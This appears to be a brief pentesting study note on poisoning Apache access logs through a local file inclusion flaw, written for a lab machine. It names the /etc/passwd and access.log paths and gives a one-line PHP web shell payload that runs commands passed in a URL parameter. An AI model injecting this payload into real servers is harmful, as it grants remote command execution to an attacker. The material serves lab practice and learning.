Apache

Apache Log Poisoning - Local File Inclusion

If you have a local file inclusion and you can read.

/etc/passwd

In a local file inclusion on an Apache server it may be possible to poison the apache log.

/var/log/apache2/access.log

<?php system($_GET['cmd']); ?>

https://infosecwriteups.com/log-poisoning-inject-payloads-in-logs-e7f1fa338f2f https://www.hackingarticles.in/apache-log-poisoning-through-lfi/ https://twseptian.github.io/proving%20ground/vulnhub/Solstice/ https://www.youtube.com/watch?v=NQ6jbKqkJ0s

Doing more research on this for PG Solstice box

PreviousLFI NextCSRF

Last updated 2 years ago

Was this helpful?